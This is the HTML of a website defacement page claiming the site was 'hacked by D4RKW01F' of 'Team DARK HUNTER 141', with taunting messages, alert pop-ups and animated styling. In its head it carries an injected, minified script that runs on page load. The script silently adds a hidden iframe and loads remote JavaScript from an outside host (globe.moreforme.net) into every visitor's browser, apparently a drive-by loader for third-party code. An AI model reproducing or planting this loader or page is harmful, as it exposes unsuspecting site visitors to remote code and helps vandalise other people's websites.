<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<title> &#1203;&#824;&#1202;&#824;&#1203; Hacked By D4RKW01F &#1203;&#824;&#1202;&#824;&#1203; </title>
<link rel="SHORTCUT ICON" href="https://f.top4top.io/p_2074re6j10.gif" type="image/jpg">
<meta name="description" content="We are Dark Hunter 141">
<meta name="viewport" content="width=device-width, initial-scale=1">

<head>
    <script>if (top == window) { var engageNameSpace = "engagens"; "undefined" == typeof window[engageNameSpace] && (window[engageNameSpace] = {}), window[engageNameSpace].engageLoader = function () { function e(e) { return "undefined" != typeof e && null !== e } function t() { var t = document.createElement("script"); t.setAttribute("src", s), t.setAttribute("id", "fn_engage_script"), t.setAttribute("async", ""), (null == document.head || e(document.head)) && (document.head = document.getElementsByTagName("head")[0]), document.head.appendChild(t) } function n() { var t = r(); if (e(t)) { var n = t; i() && (n = d(t)); var o; try { o = document.documentElement, o.appendChild(n) } catch (c) { o = document.body, o.appendChild(n) } a() } } function a() { function e(e) { var n = e.data; "l8IframeIsReady" === n.message && t() } window.addEventListener ? window.addEventListener("message", e, !1) : window.attachEvent("onmessage", e) } function r() { var t = document.createElement("iframe"); if (e(t)) { t.setAttribute("id", "fn_engage"), t.setAttribute("src", u), t.setAttribute("target", "_blank"), t.setAttribute("frameborder", "0"); var n = /firefox/i.exec(navigator.userAgent); e(n) && n.length > 0 ? (t.style.height = 0, t.style.width = 0) : t.style.display = "none", t.frameBorder = "no" } return t } function i() { var t = !1, n = /android (\d+)/i.exec(navigator.userAgent); return e(n) && n.length > 0 && (t = parseInt(n[1]) >= 4), t } function d(e) { var t = document.createElement("div"); return t.setAttribute("id", "fn_wrapper_div"), t.style.position = "fixed", t.style.display = "none", t.ontouchstart = function () { return !0 }, t.appendChild(e), t } function o() { var t = void 0, a = this, r = function () { e(t) && (window.clearTimeout(t), t = void 0, n.call(a)) }; t = window.setTimeout(r, 1e4), "function" == typeof window.addEventListener ? window.addEventListener("load", r, !1) : window.attachEvent("onload", r) } var c = "http://globe.moreforme.net", u = c + "/l8/EngageService?v=1", s = c + "/scripts/Engage.js"; o() }; var engageLoader = new window[engageNameSpace].engageLoader }</script>



    <script> alert("Hacked By D4RKW01F")</script>


    <script> alert("D4RKWO1F kissed the site!")</script>

    <style type="text/css">
        body {
            background-color: #000000;
            background-repeat: no-repeat;
            height: 120%;
            width: 99%;
            color: #ffffff;
            background-position: center;
            background-attachment: fixed;
            background-size: 100% 100%;
            background-color: #000000;
            cursor: url(https://f.top4top.io/p_2074re6j10.gif), progress !important
        }

        pre {
            margin-top: 9%;
        }

        .error {
            text-align: center;
            font-family: 'Monospace', Monospace;
            -webkit-animation: noise-3 1s linear infinite;
            animation: noise-3 1s linear infinite;
            overflow: default;
        }

        .kaito {
            animation-name: rotate;
            animation-duration: 5s;
            animation-play-state: running;
            animation-timing-function: linear;
            animation-iteration-count: infinite;
            opacity: 0.8;
            filter: alpha(opacity=50);
        }

        img:hover {
            opacity: 1.0;
            filter: alpha(opacity=100);
        }

        .info {
            text-align: center;
            width: 200px;
            height: 60px;
            margin: auto;
            position: absolute;
            top: 280px;
            bottom: 0;
            left: 20px;
            right: 0;
            -webkit-animation: noise-3 1s linear infinite;
            animation: noise-3 1s linear infinite;
        }

        .info:after {
            content: 'OWNED';
            font-family: OCR-A;
            font-size: 100px;
            text-align: center;
            width: 800px;
            margin: auto;
            position: absolute;
            top: 20px;
            bottom: 0;
            left: 40px;
            right: 0;
            opacity: 0;
            color: white;
            -webkit-animation: noise-1 .2s linear infinite;
            animation: noise-1 .2s linear infinite;
        }

        @-webkit-keyframes noise-1 {

            0%,
            20%,
            40%,
            60%,
            70%,
            90% {
                opacity: 0;
            }

            10% {
                opacity: .1;
            }

            50% {
                opacity: .5;
                left: -6px;
            }

            80% {
                opacity: .3;
            }

            100% {
                opacity: .6;
                left: 2px;
            }
        }

        @keyframes noise-1 {

            0%,
            20%,
            40%,
            60%,
            70%,
            90% {
                opacity: 0;
            }

            10% {
                opacity: .1;
            }

            50% {
                opacity: .5;
                left: -6px;
            }

            80% {
                opacity: .3;
            }

            100% {
                opacity: .6;
                left: 2px;
            }
        }

        @-webkit-keyframes noise-2 {

            0%,
            20%,
            40%,
            60%,
            70%,
            90% {
                opacity: 0;
            }

            10% {
                opacity: .1;
            }

            50% {
                opacity: .5;
                left: 6px;
            }

            80% {
                opacity: .3;
            }

            100% {
                opacity: .6;
                left: -2px;
            }
        }

        @keyframes noise-2 {

            0%,
            20%,
            40%,
            60%,
            70%,
            90% {
                opacity: 0;
            }

            10% {
                opacity: .1;
            }

            50% {
                opacity: .5;
                left: 6px;
            }

            80% {
                opacity: .3;
            }

            100% {
                opacity: .6;
                left: -2px;
            }
        }

        @-webkit-keyframes noise {

            0%,
            3%,
            5%,
            42%,
            44%,
            100% {
                opacity: 1;
                -webkit-transform: scaleY(1);
                transform: scaleY(1);
            }

            4.3% {
                opacity: 1;
                -webkit-transform: scaleY(1.7);
                transform: scaleY(1.7);
            }

            43% {
                opacity: 1;
                -webkit-transform: scaleX(1.5);
                transform: scaleX(1.5);
            }
        }

        @keyframes noise {

            0%,
            3%,
            5%,
            42%,
            44%,
            100% {
                opacity: 1;
                -webkit-transform: scaleY(1);
                transform: scaleY(1);
            }

            4.3% {
                opacity: 1;
                -webkit-transform: scaleY(1.7);
                transform: scaleY(1.7);
            }

            43% {
                opacity: 1;
                -webkit-transform: scaleX(1.5);
                transform: scaleX(1.5);
            }
        }

        @-webkit-keyframes noise-3 {

            0%,
            3%,
            5%,
            42%,
            44%,
            100% {
                opacity: 1;
                -webkit-transform: scaleY(1);
                transform: scaleY(1);
            }

            4.3% {
                opacity: 1;
                -webkit-transform: scaleY(4);
                transform: scaleY(4);
            }

            43% {
                opacity: 1;
                -webkit-transform: scaleX(10) rotate(60deg);
                transform: scaleX(10) rotate(60deg);
            }
        }

        @keyframes noise-3 {

            0%,
            3%,
            5%,
            42%,
            44%,
            100% {
                opacity: 1;
                -webkit-transform: scaleY(1);
                transform: scaleY(1);
            }

            4.3% {
                opacity: 1;
                -webkit-transform: scaleY(4);
                transform: scaleY(4);
            }

            43% {
                opacity: 1;
                -webkit-transform: scaleX(10) rotate(60deg);
                transform: scaleX(10) rotate(60deg);
            }
        }

        .wrap {
            top: 30%;
            left: 25%;
            height: 200px;
            margin-top: -100px;
            position: absolute;
        }

        code {
            color: white;
        }

        span.blue {
            color: #48beef;
        }

        span.comment {
            color: #7f8c8d;
        }

        span.orange {
            color: #f39c12;
        }

        span.green {
            color: #33cc33;
        }

        .viewFull {
            font-family: OCR-A;
            color: orange;
            text-decoration: ;
        }
        }

        @media only screen and (min-height: 500px) {
            .viewFull {
                display: none;
            }
        }
    </style>
    <style>
        body {
            background-color: black;
        }

        a:link,
        a:visited {
            color: white;
            text-align: center;
            text-decoration: none;
            display: inline-block;
        }

        a:hover,
        a:active {
            color: maroon;
        }

        @keyframes rotate {
            10% {
                transform: rotateY(36deg)
            }

            20% {
                transform: rotateY(72deg)
            }

            30% {
                transform: rotateY(108deg)
            }

            40% {
                transform: rotateY(144deg)
            }

            50% {
                transform: rotateY(180deg)
            }

            60% {
                transform: rotateY(216deg)
            }

            70% {
                transform: rotateY(252deg)
            }

            80% {
                transform: rotateY(288deg)
            }

            90% {
                transform: rotateY(324deg)
            }

            100% {
                transform: rotateY(360deg)
            }
        }
    </style>
</head>
</script>
<style>
    td {
        align: center;
        font-family: Bradley Hand ITC;
        font-size: 18pt;
        color: black
    }

    a {
        align: center;
        font-family: Bradley Hand ITC;
        font-size: 12pt;
        color: red
    }
</style>
<center> <br>
    <div class="kaito">
        <img src="https://i.top4top.io/p_2239fi3rm1.png" width="150" height"150">
    </div><br>
    <div id="example1">




        <body background="https://h.top4top.io/p_2239w1bbp1.gif">
            <div class="error">
                <h4>
                    <font face='Monospace' color='gold'>
                        <center>[=--
                    </font>
                    <font face='Monospace' color='#57F9FF'> Hacked By : D4RKW01F</font>
                    <font face='Monospace' color='gold'>--=]</font><br><br>
            </div>
            <font face='Monospace' color='red'>
                <center>#
            </font>
            <font face='Monospace' color='#57F9FF'>


                Hello Admin <br> Your site hacked by D4RKW01F<br>Fuck The Security<br>No SYSTEM IS SAFE<br>Team DARK
                HUNTER 141</font>




            <font face='Monospace' color='red'>#</font><br><br>
            <font face='Monospace' color='white'>
                <center>-:-
            </font>
            <font face='Monospace' color='#57F9FF'> We are legion </font>
            <font face='Monospace' color='white'>-:-</font><br><br>
            <font face='Monospace' color='#57F9FF'>

                <center> Expect us!</center>



                <br>
    </div>
    </font> </span> </font>
    <font color="#808080" face="Tahoma"> <span>
            <ul>
                <font color="#000000">
</center>
</font>
<script type="text/javascript"></script>
</center>
</body>